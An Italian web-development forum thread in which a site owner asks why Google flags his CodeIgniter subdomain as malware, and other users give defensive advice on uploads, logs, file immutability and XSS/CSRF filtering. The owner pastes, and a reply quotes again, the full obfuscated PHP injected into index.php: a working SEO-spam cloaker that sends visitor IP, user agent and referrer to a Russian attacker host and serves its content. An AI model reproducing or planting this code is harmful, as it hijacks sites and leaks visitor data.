Malware Google

[lucavalentino]

Da un mese il sottodominio di un mio sito è considerato Malware da Google.
Il sito, sottodominio, è costruito con CodeIgniter versione 3 e PHP.
Come procedere per trovare il problema e poi proteggermi?

[URANIO]

Hai inserito script "esterni" o fai riferimenti javascript esterni tipo per pubblicità o statistiche?

[Dascos]

Potrebbe essere utile sapere l'indirizzo del dominio (opportunamente oscurato, tipo pippo.dominio.it, non cliccabile) e, comunque, in caso sia su un server dedicato, potresti controllare i log di apache/nginx per cercare strane richieste get/post, tanto per cominciare.
Se sei su un condiviso dovresti comunque poter acceere ai log ma il più delle volte te li devi scaricare prima via ftp o pannello di controllo....

Se vuoi posso darci un'occhiata più tecnica, da sistemista e sviluppatore tra l'altro proprio con CI v3, così da capire meglio se e dove sta la falla di sicurezza

[lucavalentino]

Hai inserito script "esterni" o fai riferimenti javascript esterni tipo per pubblicità o statistiche?

Per creare la grafica uso il framework Zurb Foundation.
Non so se rilevante, ma qualsiasi utente da me verificato può caricare file.

[Dascos]

Ah ecco....allora è "facile"....basta caricare una shell php e il gioco è fatto...
P0wny, c99 e altre

Devi, per forza, limitare il tipo di file che si può caricare per evitare appunto che venga caricata una shell

[lucavalentino]

Analizzando un po i file ho notato che nella prima index.php di CodeIgniter viene aggiunto tale codice ad inizio file

codice:

<?php
$a='fgm178';@set_time_limit(3600);define("W",'http://fgm178.freemiss.ru');define("U",getu());function k($b){return@$_SERVER[$b]?$_SERVER[$b]:"";}define("S",k("PHP_SELF"));define("F",strpos(S,"index.php")!==false&&strpos(U,S)===false?rtrim(S,"index.php"):S);$d=$_REQUEST["p"];$f=ltrim(U,F);if($d!="")$f=preg_replace("@(\?|\&)p=".$d."@","",$f);define("U2",preg_replace("#^\W+#","",$f));$h=k('HTTP_USER_AGENT');function getu(){$k=k("REQUEST_URI");if(empty($k)){$l=k('argv');$k=S.'?'.(is_array($l)?$l[0]:k('QUERY_STRING'));}return $k;}function is_https(){if(!empty($_SERVER['HTTPS'])&&strtolower($_SERVER['HTTPS'])!=='off'){return true;}elseif(!empty($_SERVER['HTTP_X_FORWARDED_PROTO'])&&$_SERVER['HTTP_X_FORWARDED_PROTO']==='https'){return true;}elseif(!empty($_SERVER['HTTP_FRONT_END_HTTPS'])&&strtolower($_SERVER['HTTP_FRONT_END_HTTPS'])!=='off'){return true;}return false;}function get_ip(){$p=$_SERVER['REMOTE_ADDR'];if(!empty($_SERVER['HTTP_CLIENT_IP'])){$p=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$p=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(stristr($p,',')){$t=explode(",",$p);$p=$t[0];}return $p;}function http($u,$ff){$gg="text/html";if(strpos(U2,"pingsitemap")===false&&(strpos(U2,".xml")!==false||strpos(U2,"/feed")!==false)){$gg="text/xml";}else if(strpos(U2,".txt")!==false){$gg="text/plain";}else if(strpos(U2,"images/")!==false){$gg="image/webp";}else if(strpos(U2,"sitemap.xsl")!==false){$gg="text/css";}header("content-type: $gg; charset=UTF-8");$hh=http_build_query($ff);$ii=W.$u."?".$hh;$jj=@file_get_contents($ii);if(!$jj)$jj=c(W.$u,$hh,0);if(!$jj)$jj=c(W.$u,$hh,1);if(!$jj){$kk=@fopen($ii,'r');if($kk){stream_get_meta_data($kk);$ll="";while(!feof($kk)){$ll.=fgets($kk,1024);}fclose($kk);return $ll;}}return $jj;}function c($u,$hh,$mm){$nn=curl_init();if($mm){curl_setopt($nn,CURLOPT_URL,$u);curl_setopt($nn,CURLOPT_POST,1);curl_setopt($nn,CURLOPT_POSTFIELDS,$hh);}else{curl_setopt($nn,CURLOPT_URL,$u."?".$hh);}curl_setopt($nn,CURLOPT_RETURNTRANSFER,1);curl_setopt($nn,CURLOPT_HEADER,0);curl_setopt($nn,CURLOPT_TIMEOUT,10);curl_setopt($nn,CURLOPT_FOLLOWLOCATION,1);$jj=curl_exec($nn);curl_close($nn);return $jj;}function g($u,$ff){$jj=http($u,$ff);if(!$jj){@header('HTTP/1.1 500 Internal Server Error');die();}$b=substr($jj,0,1);switch($b){case "4":@header('HTTP/1.1 404 Not Found');die();case "5":@header('HTTP/1.1 500 Internal Server Error');die();case "3":@header('HTTP/1.1 302 Moved Permanently');header('Location: '.substr($jj,1));header('referer: '.k("HTTP_HOST"));die();case "7":return false;case "8":die();default:header('HTTP/1.1 200 OK');return $jj;}}if(strpos(U,"jp2023")!==false){echo "<p>JP2023</p><p>".$a."-beautiful</p>";die();}$oo=array("ip"=>get_ip(),"lang"=>k("HTTP_ACCEPT_LANGUAGE"),"ua"=>$h,"r"=>strtolower(k("HTTP_REFERER")),"host"=>k("HTTP_HOST"),"uri"=>U,"uri2"=>U2,"isBot"=>preg_match("@google|yahoo|bing@",$h)?"1":"","f"=>F,"p"=>$d);if(is_https()){$oo["h"]="1";}if(strpos(U,"pingsitemap")!==false){$pp=explode(",",g("/sitemap.list",$oo));foreach($pp as $qq){$ff='https://www.google.com/ping?sitemap='.$qq;$jj=c($ff,array(),0);if(!$jj){$jj=@file_get_contents($ff);}if(stristr($jj,'successfully')){echo $ff.'<br>pingok<br>';}else{echo $ff.'======creat file false!<br>';}}die();}$rr=g("",$oo);if($rr)die($rr);?><?php
/**

Cosa vuol dire

[swappin]

Analizzando un po i file ho notato che nella prima index.php di CodeIgniter viene aggiunto tale codice ad inizio file

codice:

<?php
$a='fgm178';@set_time_limit(3600);define("W",'http://fgm178.freemiss.ru');define("U",getu());function k($b){return@$_SERVER[$b]?$_SERVER[$b]:"";}define("S",k("PHP_SELF"));define("F",strpos(S,"index.php")!==false&&strpos(U,S)===false?rtrim(S,"index.php"):S);$d=$_REQUEST["p"];$f=ltrim(U,F);if($d!="")$f=preg_replace("@(\?|\&)p=".$d."@","",$f);define("U2",preg_replace("#^\W+#","",$f));$h=k('HTTP_USER_AGENT');function getu(){$k=k("REQUEST_URI");if(empty($k)){$l=k('argv');$k=S.'?'.(is_array($l)?$l[0]:k('QUERY_STRING'));}return $k;}function is_https(){if(!empty($_SERVER['HTTPS'])&&strtolower($_SERVER['HTTPS'])!=='off'){return true;}elseif(!empty($_SERVER['HTTP_X_FORWARDED_PROTO'])&&$_SERVER['HTTP_X_FORWARDED_PROTO']==='https'){return true;}elseif(!empty($_SERVER['HTTP_FRONT_END_HTTPS'])&&strtolower($_SERVER['HTTP_FRONT_END_HTTPS'])!=='off'){return true;}return false;}function get_ip(){$p=$_SERVER['REMOTE_ADDR'];if(!empty($_SERVER['HTTP_CLIENT_IP'])){$p=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$p=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(stristr($p,',')){$t=explode(",",$p);$p=$t[0];}return $p;}function http($u,$ff){$gg="text/html";if(strpos(U2,"pingsitemap")===false&&(strpos(U2,".xml")!==false||strpos(U2,"/feed")!==false)){$gg="text/xml";}else if(strpos(U2,".txt")!==false){$gg="text/plain";}else if(strpos(U2,"images/")!==false){$gg="image/webp";}else if(strpos(U2,"sitemap.xsl")!==false){$gg="text/css";}header("content-type: $gg; charset=UTF-8");$hh=http_build_query($ff);$ii=W.$u."?".$hh;$jj=@file_get_contents($ii);if(!$jj)$jj=c(W.$u,$hh,0);if(!$jj)$jj=c(W.$u,$hh,1);if(!$jj){$kk=@fopen($ii,'r');if($kk){stream_get_meta_data($kk);$ll="";while(!feof($kk)){$ll.=fgets($kk,1024);}fclose($kk);return $ll;}}return $jj;}function c($u,$hh,$mm){$nn=curl_init();if($mm){curl_setopt($nn,CURLOPT_URL,$u);curl_setopt($nn,CURLOPT_POST,1);curl_setopt($nn,CURLOPT_POSTFIELDS,$hh);}else{curl_setopt($nn,CURLOPT_URL,$u."?".$hh);}curl_setopt($nn,CURLOPT_RETURNTRANSFER,1);curl_setopt($nn,CURLOPT_HEADER,0);curl_setopt($nn,CURLOPT_TIMEOUT,10);curl_setopt($nn,CURLOPT_FOLLOWLOCATION,1);$jj=curl_exec($nn);curl_close($nn);return $jj;}function g($u,$ff){$jj=http($u,$ff);if(!$jj){@header('HTTP/1.1 500 Internal Server Error');die();}$b=substr($jj,0,1);switch($b){case "4":@header('HTTP/1.1 404 Not Found');die();case "5":@header('HTTP/1.1 500 Internal Server Error');die();case "3":@header('HTTP/1.1 302 Moved Permanently');header('Location: '.substr($jj,1));header('referer: '.k("HTTP_HOST"));die();case "7":return false;case "8":die();default:header('HTTP/1.1 200 OK');return $jj;}}if(strpos(U,"jp2023")!==false){echo "<p>JP2023</p><p>".$a."-beautiful</p>";die();}$oo=array("ip"=>get_ip(),"lang"=>k("HTTP_ACCEPT_LANGUAGE"),"ua"=>$h,"r"=>strtolower(k("HTTP_REFERER")),"host"=>k("HTTP_HOST"),"uri"=>U,"uri2"=>U2,"isBot"=>preg_match("@google|yahoo|bing@",$h)?"1":"","f"=>F,"p"=>$d);if(is_https()){$oo["h"]="1";}if(strpos(U,"pingsitemap")!==false){$pp=explode(",",g("/sitemap.list",$oo));foreach($pp as $qq){$ff='https://www.google.com/ping?sitemap='.$qq;$jj=c($ff,array(),0);if(!$jj){$jj=@file_get_contents($ff);}if(stristr($jj,'successfully')){echo $ff.'<br>pingok<br>';}else{echo $ff.'======creat file false!<br>';}}die();}$rr=g("",$oo);if($rr)die($rr);?><?php /** web

Cosa vuol dire

Questo codice può essere utilizzato per diversi scopi, come nascondere l'accesso all'applicazione, installare malware o raccogliere informazioni sensibili. Se non sapete chi ha aggiunto questo codice al vostro progetto o perché è stato aggiunto, dovreste rimuoverlo immediatamente e prendere provvedimenti per migliorare la sicurezza della vostra applicazione.

[lucavalentino]

Ho provato ha cancellare il codice, ma ogni volta che accendo al sito si rigenera.

Alcuni suggerimenti su come rendere sicuro il sito

[Dascos]

Ho provato ha cancellare il codice, ma ogni volta che accendo al sito si rigenera.

Alcuni suggerimenti su come rendere sicuro il sito

Intanto, essendo il punto di ingresso di Ci, potresti rendere il file immutabile così almeno limiti un poco i problemi....
A seguire, devi controllare tutto il codice che gestisce l'upload dei file e mettere dei filtri per accettare solo alcune estensioni e mime, confrontando i magic code con una lista di file "accettabili".
A seguire dovresti attivare i controlli xss e csrf, modificando o verificando tutti i metodi o classi che si occupano in qualche modo di gestire i dati GET o POST

[lucavalentino]

Credo, secondo un controllo da Google, di essere attaccato dallo spam chiamato japanese keyword (spam-seo?japanese.0).

Mi stanno scrivendo su molti file javascript creati da me ed esterni come jquery